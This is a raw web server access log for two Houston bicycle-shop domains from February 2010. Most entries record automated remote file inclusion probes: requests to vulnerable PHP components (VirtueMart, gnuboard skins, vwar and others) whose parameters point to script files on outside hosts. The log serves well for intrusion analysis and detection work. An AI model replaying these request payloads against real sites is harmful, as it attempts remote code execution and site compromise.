62.141.56.136 - - [10/Feb/2010:06:13:18 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.djramon.nl//gb/skins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:13:42 -0800] "GET /write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:13:42 -0800] "GET /logs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:13:42 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:16:07 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:16:07 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:16:07 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:16:46 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:16:46 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:16:46 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:17:00 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:17:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:06:17:00 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.207.120.69 - - [10/Feb/2010:06:17:13 -0800] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
24.207.120.69 - - [10/Feb/2010:06:17:14 -0800] "GET /?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.831" "houstonbikeshop.com"
24.207.120.69 - - [10/Feb/2010:06:17:14 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.831" "houstonbikeshop.com"
198.171.171.177 - - [10/Feb/2010:06:30:04 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
198.171.171.177 - - [10/Feb/2010:06:30:04 -0800] "GET /appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
198.171.171.177 - - [10/Feb/2010:06:30:05 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:30:31 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:30:32 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:30:36 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:06:32:02 -0800] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:06:32:03 -0800] "GET /?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:06:32:04 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.820" "houstonbikeshop.com"
76.73.56.64 - - [10/Feb/2010:06:39:29 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
76.73.56.64 - - [10/Feb/2010:06:39:29 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
76.73.56.64 - - [10/Feb/2010:06:39:29 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:46:47 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:46:47 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:46:47 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [10/Feb/2010:06:49:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
67.195.115.119 - - [10/Feb/2010:06:54:11 -0800] "GET /logs/?N=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
204.213.93.197 - - [10/Feb/2010:06:59:03 -0800] "GET /logs//write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.213.93.197 - - [10/Feb/2010:06:59:03 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.213.93.197 - - [10/Feb/2010:06:59:03 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.207.120.69 - - [10/Feb/2010:07:15:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
204.213.93.197 - - [10/Feb/2010:07:16:42 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.213.93.197 - - [10/Feb/2010:07:16:42 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.213.93.197 - - [10/Feb/2010:07:16:42 -0800] "GET /logs//write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.207.120.69 - - [10/Feb/2010:07:21:33 -0800] "GET //vwar/backup/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:07:29:16 -0800] "GET //vwar/backup/errors.php?error=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:07:29:16 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.155.18 - - [10/Feb/2010:07:29:16 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
198.171.171.177 - - [10/Feb/2010:07:30:24 -0800] "GET //vwar/backup/errors.php?error=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
216.17.100.177 - - [10/Feb/2010:07:30:39 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.100.177 - - [10/Feb/2010:07:30:39 -0800] "GET /logs///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.100.177 - - [10/Feb/2010:07:30:39 -0800] "GET //vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.100.177 - - [10/Feb/2010:07:30:56 -0800] "GET //vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.100.177 - - [10/Feb/2010:07:30:56 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.100.177 - - [10/Feb/2010:07:30:56 -0800] "GET /logs///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.247.64.12 - - [10/Feb/2010:07:33:44 -0800] "GET /logs///vwar/backup/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.247.64.12 - - [10/Feb/2010:07:33:44 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.247.64.12 - - [10/Feb/2010:07:33:44 -0800] "GET //vwar/backup/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [10/Feb/2010:07:36:42 -0800] "GET /blog/ HTTP/1.1" 401 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
201.28.110.99 - - [10/Feb/2010:07:45:39 -0800] "GET /logs//include.php?path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.28.110.99 - - [10/Feb/2010:07:45:39 -0800] "GET /include.php?path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.28.110.99 - - [10/Feb/2010:07:45:44 -0800] "GET /logs/access.log//include.php?path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.240.36.36 - - [10/Feb/2010:07:53:28 -0800] "GET /logs/access.log//gallery.php//?path[docroot]=http://laternamedica.se/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.240.36.36 - - [10/Feb/2010:07:53:28 -0800] "GET /logs//gallery.php//?path[docroot]=http://laternamedica.se/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.240.36.36 - - [10/Feb/2010:07:53:31 -0800] "GET /gallery.php//?path[docroot]=http://laternamedica.se/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.129.52.110 - - [10/Feb/2010:07:58:59 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.129.52.110 - - [10/Feb/2010:07:58:59 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.129.52.110 - - [10/Feb/2010:07:58:59 -0800] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.129.52.110 - - [10/Feb/2010:07:59:04 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.129.52.110 - - [10/Feb/2010:07:59:05 -0800] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.129.52.110 - - [10/Feb/2010:07:59:05 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:07:59:41 -0800] "GET /logs/access.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:07:59:41 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:07:59:41 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [10/Feb/2010:08:02:15 -0800] "GET /logs/access.log%20%20///delete_comment.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [10/Feb/2010:08:02:15 -0800] "GET //delete_comment.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [10/Feb/2010:08:02:15 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [10/Feb/2010:08:02:15 -0800] "GET /logs/access.log%20%20///delete_comment.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [10/Feb/2010:08:02:15 -0800] "GET //delete_comment.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [10/Feb/2010:08:02:15 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:08:13 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:08:13 -0800] "GET /logs/access.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:08:13 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:08:26 -0800] "GET /logs/access.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:08:26 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:08:26 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:08:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:08:55 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:08:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:08:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:08:56 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:08:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:10:37 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:08:10:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:08:10:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:08:13:33 -0800] "GET /logs/access.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:13:33 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:08:13:33 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:18:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:18:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:18:18 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:18:36 -0800] "GET /ask_password.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:18:36 -0800] "GET /logs/access.log%20%20//ask_password.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:18:36 -0800] "GET /logs//ask_password.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:08:20:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:08:20:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:08:20:54 -0800] "GET /logs/scripts.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.140.23.24 - - [10/Feb/2010:08:21:07 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [10/Feb/2010:08:21:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [10/Feb/2010:08:21:07 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:21:22 -0800] "GET /ask_password.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:21:22 -0800] "GET /logs/access.log%20%20//ask_password.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.111.3.35 - - [10/Feb/2010:08:21:22 -0800] "GET /logs//ask_password.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:08:22:40 -0800] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:08:22:40 -0800] "GET /logs/access.log%20%20//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:08:22:40 -0800] "GET /components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:08:24:30 -0800] "GET /components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:08:24:30 -0800] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:08:24:30 -0800] "GET /logs/access.log%20%20//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [10/Feb/2010:08:24:34 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.24 - - [10/Feb/2010:08:24:34 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
